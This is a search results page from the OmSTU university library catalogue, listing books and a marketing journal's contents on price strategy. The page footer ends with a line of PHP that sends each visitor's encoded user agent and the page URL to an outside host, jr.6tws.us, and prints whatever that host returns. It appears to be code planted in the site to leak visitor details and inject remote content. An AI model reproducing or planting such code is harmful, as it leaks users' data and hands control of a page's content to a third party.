Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

205 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Ценовая стратегия")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 11
1. 
Экономика предприятия [Текст] : Учеб. по модулю экон. подгот. техн. специальностей / И. Э. Берзинь, С. А. Пикунова, Н. Н. Савченко, С. Г. Фалько; Под ред. С. Г. Фалько, 2004. - 367 с.

В учебнике рассматриваются основные вопросы, связанные с деятельностью предприятия в условиях рыночной экономики, развивающейся в России: виды предприятий, <ресурсы>, <издержки> <производства>, основы <ценообразования>, методы <учета> и анализа деятельности предприятия, <эффективность> <инвестиций> и <инноваций>, основы технико-экономического анализа конструкторских решений, <контроллинг> на предприятии и др. В издании учтены действующие на территории Российской Федерации законодательные акты и нормативные документы.

2. 
Экономика предприятия : в схемах, таблицах, расчетах : учебное пособие для вузов / ред.: В. К. Скляренко, В. М. Прудников, 2002. - 200 с.
Держатели документа (Информация об экземплярах) 
3. 
Котлер, Филип. Маркетинг. Менеджмент : экспресс-курс / Ф. Котлер, К. Л. Келлер, 2007. - 480 с.
Держатели документа (Информация об экземплярах) 
4. 
Маркетинг в России и за рубежом. - Журнал, 2009г. № 5
Оглавление 
  • Веселов, А. И. Антикризисное управление ассортиментной политикой по целям / А. И. Веселов. - с.3-6 : табл.
  • Симановская, М. Л. Микро- и макромаркетинг в условиях кризиса / М. Л. Симановская, Е. С. Крупецкая. - с.7-14.
    Кл. слова: Партизанский маркетинг
  • Сейранян, М. Г. Маркетинговые исследования потребительских предпочтений в отношении напитков с антиоксидантными свойствами / М. Г. Сейранян. - с.18-26 : ил.
  • Новицкая, Е. Г. Изучение потребительских предпочтений в отношении овощных соков в г. Владивостоке / Е. Г. Новицкая [и др.]. - с.27-32 : ил.
    Другие авторы: Каленик Т. К., Парфенова Т. В., Коростылева Л. А.
  • Горчакова, В. Г. Знаки в имидже публичной персоны / В. Г. Горчакова. - с.33-38.
    Кл. слова: Образ, Фишка, Символ
  • Максименко, А. А. Маркетинг некрофилии / А. А. Максименко. - с.39-48 : ил.
    Кл. слова: Жестокость, Насилие, Криминал
  • Пашутин, С. Б. Манипуляции и "зомбирование" в маркетинге / С. Б. Пашутин. - с.49-58.
    Кл. слова: Влияние на подсознание покупателя, Реклама
  • Пучкова, Н. С. Разработка уникального торгового предложения / Н. С. Пучкова. - с.59-66 : ил.
    Кл. слова: Идеальный клиент
  • Симонов, К. В. Управление конкурентоспособностью выставочных услуг / К. В. Симонов. - с.67-72 : ил.
    Кл. слова: Экспоуслуги
  • Чайков, М. Ю. Повышение конкурентоспособности путем совершенствования рационализаторской деятельности на предприятии / М. Ю. Чайков. - с.73-79 : ил.
    Кл. слова: Повешение качества, надежности и производительности труда, Внедрение инноваций, Система рационализации на ФГУП УЭМЗ
  • Исин, Ж. М. Ключевые вопросы маркетинговой стратегии в банковской сфере / Ж. М. Исин. - с.80-88 : ил.
    Кл. слова: Ценовая стратегия, Стратегия продвижения, Банковские услуги
  • Мостовая, Ю. П. Модели управления качеством услуг (на примере банковских услуг) / Ю. П. Мостовая. - с.89-96 : ил.
  • Соколова, И. С. Особенности реализации концепции социально-этического маркетинга в естественно-научном книгоиздании / И. С. Соколова. - с.97-101.
  • Артюшина, Е. В. Управление международными маркетинговыми коммуникациями / Е. В. Артюшина. - с.102-105 : ил.
  • Качанова, Т. С. Благоприятна ли восточная среда для бренд-менеджмента / Т. С. Качанова. - с.106-111.
  • Уткина, Н. В. Характеристика и перспективы развития мирового рынка обуви / Н. В. Уткина. - с.112-121 : ил.
  • Марданова, Э. У. Определение емкости розничного рынка товаров садово-огородной тематики ряда городов Республики Башкортостан / Э. У. Марданова. - с.122-133 : ил.
    Кл. слова: Рынок многолетних и декоративных растений, Инвентарь
5. 
Трацевский, Игорь Павлович. Ценообразование [Текст] : Учеб. пособие для экон. специальностей вузов / И. П. Трацевский, И. Н. Грекова, 2000. - 158, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии предпринята попытка обобщить накопленный за последние годы мировой опыт ценообразования. Раскрыты основные особенности ценообразования для предприятий в новых условиях рыночных отношений, положения, определяющие выбор ценовой стратегии предприятия с учетом развития конкуренции на различных типах рынков.

6. 
Логистика, эффективность и риски внешнеэкономических операций [Текст] / К. В. Захаров, А. В. Цыганок, В. П. Бочарников, А. К. Захаров, 2001. - 237 с.
Держатели документа (Информация об экземплярах) 
7. 
Эванс Дж. Р. Маркетинг [Текст] : Пер. с англ. / Дж. Р. Эванс, Б. Берман, 2000. - 308 с.
8. 
Кусков Ю. В. "Бег к вершинам мастерства.." или классический маркетинг на рынке сварочных материалов [Текст]Вып. 5 / Ю. В. Кусков, 2000. - 88 с.
9. 
Данько Т. П. Управление маркетингом [Текст] : Учеб. для экон. специальностей вузов / Т. П.Данько, 2001. - 334 с.
10. 
Кудринская, Людмила Александровна. Организация внешнеторговых операций на уровне предприятия [Текст] : Учеб. пособие / Л. А. Кудринская, 2003. - 110 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

Рассмотрены основные понятия, раскрывающие содержание внешнеторговой деятельности предприятия, организацию и этапы этой деятельности, способы ее регулирования со стороны государства. Дан исторический экскурс и выявлены особенности современного международного товарного обращения.

Полный текст
11. 
Дурович, Александр Петрович. Маркетинг в предпринимательской деятельности [Текст] / А. П. Дурович, 1997. - 462 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3179 - 22.02.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.26 с.14 запросов, 0.83c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;